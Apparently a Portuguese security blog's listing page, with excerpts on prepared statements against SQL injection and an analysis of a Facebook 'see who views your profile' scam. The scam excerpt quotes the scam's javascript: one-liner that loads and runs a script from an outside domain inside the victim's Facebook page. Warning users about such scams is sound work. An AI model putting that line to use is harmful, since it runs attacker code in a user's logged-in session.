É muito comum quando se estuda uma linguagem não se dar principal foco ao desenvolvimento em segurança, mas este, em ambientes de produção é um dos factores decisivos do sucesso de uma aplicação e da confiança por parte dos utilizadores. Neste artigo vai ser abordada uma forma de defesa relativa a possíveis ataques de SQL… Continue reading Prepared Statements contra SQL Injection
Year: 2011
Análise Facebook: See who views your profile
Para quem não reparou ainda há a circular uma praga no Facebook que utiliza o motivo de permitir ver quem visita o perfil ! Esta página incita o utilizador executar o seguinte código no browser tendo a página do facebook aberta. javascript:(a=(b=document).createElement(‘script’)).src=’//bbbindia4.in/jsp.php’,b.body.appendChild(a);void(0) Este código simplesmente adiciona o código presente na página bbindia4.in/jsp.php à página do… Continue reading Análise Facebook: See who views your profile